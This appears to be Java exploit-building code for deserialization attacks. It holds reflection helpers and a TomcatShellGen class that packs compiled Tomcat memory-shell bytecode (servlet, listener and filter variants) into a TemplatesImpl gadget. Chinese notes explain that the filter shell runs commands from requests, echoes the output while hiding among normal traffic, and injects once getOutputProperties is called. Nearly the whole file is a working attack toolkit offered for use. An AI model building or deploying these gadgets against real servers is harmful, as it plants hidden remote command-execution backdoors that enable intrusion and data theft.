/**
 * Instantiates {@code classToInstantiate} through the JDK serialization
 * constructor mechanism, i.e. the way {@code ObjectInputStream} builds objects:
 * the constructor that actually runs is the one looked up on
 * {@code constructorClass} (a supertype), so the target class's own
 * constructors are skipped.
 *
 * @param classToInstantiate the concrete class of the returned object
 * @param constructorClass   a supertype whose constructor is invoked instead
 * @param consArgTypes       parameter types used to select that constructor
 * @param consArgs           arguments passed to that constructor
 * @return a new instance of {@code classToInstantiate}
 * @throws Exception any reflection failure (no such constructor, access denied,
 *                   or an exception thrown by the invoked constructor)
 */
@SuppressWarnings("unchecked")
public static <T> T createWithConstructor(Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs) throws Exception {
    Constructor<? super T> superCtor = constructorClass.getDeclaredConstructor(consArgTypes);
    superCtor.setAccessible(true);
    // sun.reflect.ReflectionFactory is an unsupported internal API; it still ships
    // in the jdk.unsupported module but may warn or disappear on newer JDKs.
    ReflectionFactory factory = ReflectionFactory.getReflectionFactory();
    Constructor<?> serialCtor = factory.newConstructorForSerialization(classToInstantiate, superCtor);
    serialCtor.setAccessible(true);
    Object instance = serialCtor.newInstance(consArgs);
    return (T) instance;
}
/**
 * Looks up a declared field by name on {@code clazz}, walking up the
 * superclass chain until it is found, and marks it accessible.
 *
 * Only {@link NoSuchFieldException} is treated as "keep looking"; any other
 * failure (for example an access check rejecting {@code setAccessible}) is
 * propagated to the caller.
 *
 * @param clazz     the class to start the search from
 * @param fieldName the declared field name to find
 * @return the accessible {@link Field}, or {@code null} if no class in the
 *         hierarchy declares it
 */
public static Field getField(final Class<?> clazz, final String fieldName) {
    Class<?> current = clazz;
    do {
        try {
            Field found = current.getDeclaredField(fieldName);
            found.setAccessible(true);
            return found;
        } catch (NoSuchFieldException ignored) {
            // not declared here; try the superclass
        }
        current = current.getSuperclass();
    } while (current != null);
    return null;
}
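/**
 * Reads the value of the named field from {@code obj}, searching the object's
 * class and its superclasses via {@link #getField(Class, String)}.
 *
 * @param obj       the instance to read from (must not be null)
 * @param fieldname the field name to read
 * @return the field's current value
 * @throws NoSuchFieldException if no class in {@code obj}'s hierarchy declares
 *                              the field (instead of the NullPointerException the
 *                              unchecked {@code field.get} would otherwise raise)
 * @throws Exception            any other reflection failure
 */
public static Object getFieldValue(Object obj, String fieldname) throws Exception {
    Field field = getField(obj.getClass(), fieldname);
    if (field == null) {
        // getField returns null when the field does not exist; surface that clearly.
        throw new NoSuchFieldException(obj.getClass().getName() + " has no field named " + fieldname);
    }
    return field.get(obj);
}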
filter
无参构造处注册自己,注意setFilter传this。
在处理请求的地方执行命令并回显结果,注意别影响正常业务逻辑
然后剩下的其他重写的方法都不用写。
listener
servlet
封装
马写好后,把字节码传给TemplatesImpl。
最后得到的TemplatesImpl只要一调用getOutputProperties就立刻注入马。
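/**
 * Builds {@code TemplatesImpl} objects whose embedded translet bytecode is one
 * of the bundled shell classes (servlet, listener or filter variant).
 *
 * The class bytes are read from a classpath resource next to this class and
 * written into TemplatesImpl's private fields by reflection. Per the
 * accompanying notes, calling {@code getOutputProperties()} on the returned
 * object is what causes the embedded class to be loaded.
 */
public class TomcatShellGen {

    /** TemplatesImpl carrying {@code ServletShell.class}. */
    public static TemplatesImpl servletShell() throws Exception {
        return doGen("ServletShell.class");
    }

    /** TemplatesImpl carrying {@code ListenerShell.class}. */
    public static TemplatesImpl listenerShell() throws Exception {
        return doGen("ListenerShell.class");
    }

    /** TemplatesImpl carrying {@code FilterShell.class}. */
    public static TemplatesImpl filterShell() throws Exception {
        return doGen("FilterShell.class");
    }

    /**
     * Reads {@code shellClass} as a resource relative to this class and wraps
     * its bytes in a TemplatesImpl.
     *
     * @param shellClass resource name of the compiled shell class
     * @return a TemplatesImpl whose {@code _bytecodes} holds that class
     * @throws IllegalArgumentException if the resource is not on the classpath
     *                                  (the original code would NPE inside the reader)
     * @throws Exception                on any reflection or I/O failure
     */
    public static TemplatesImpl doGen(String shellClass) throws Exception {
        byte[] code;
        // try-with-resources: the original never closed this stream.
        try (InputStream in = TomcatShellGen.class.getResourceAsStream(shellClass)) {
            if (in == null) {
                throw new IllegalArgumentException("shell class resource not found: " + shellClass);
            }
            code = Util.inputStream2ByteArray(in);
        }
        Class<?> clazz = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
        TemplatesImpl templates = new TemplatesImpl();
        // _bytecodes is an array of class-file byte arrays; only one class is supplied here.
        setPrivate(clazz, templates, "_bytecodes", new byte[][]{code});
        // NOTE(review): "Hello" is an arbitrary non-null name; whether the value
        // matters beyond being non-null is not established here — confirm.
        setPrivate(clazz, templates, "_name", "Hello");
        // NOTE(review): presumably required by TemplatesImpl's translet-loading
        // path; the original set it unconditionally, so it is kept.
        setPrivate(clazz, templates, "_tfactory", new TransformerFactoryImpl());
        setPrivate(clazz, templates, "_transletIndex", 0);
        return templates;
    }

    /** Sets a private field declared on {@code clazz} via reflection. */
    private static void setPrivate(Class<?> clazz, Object target, String fieldName, Object value) throws Exception {
        Field field = clazz.getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(target, value);
    }
}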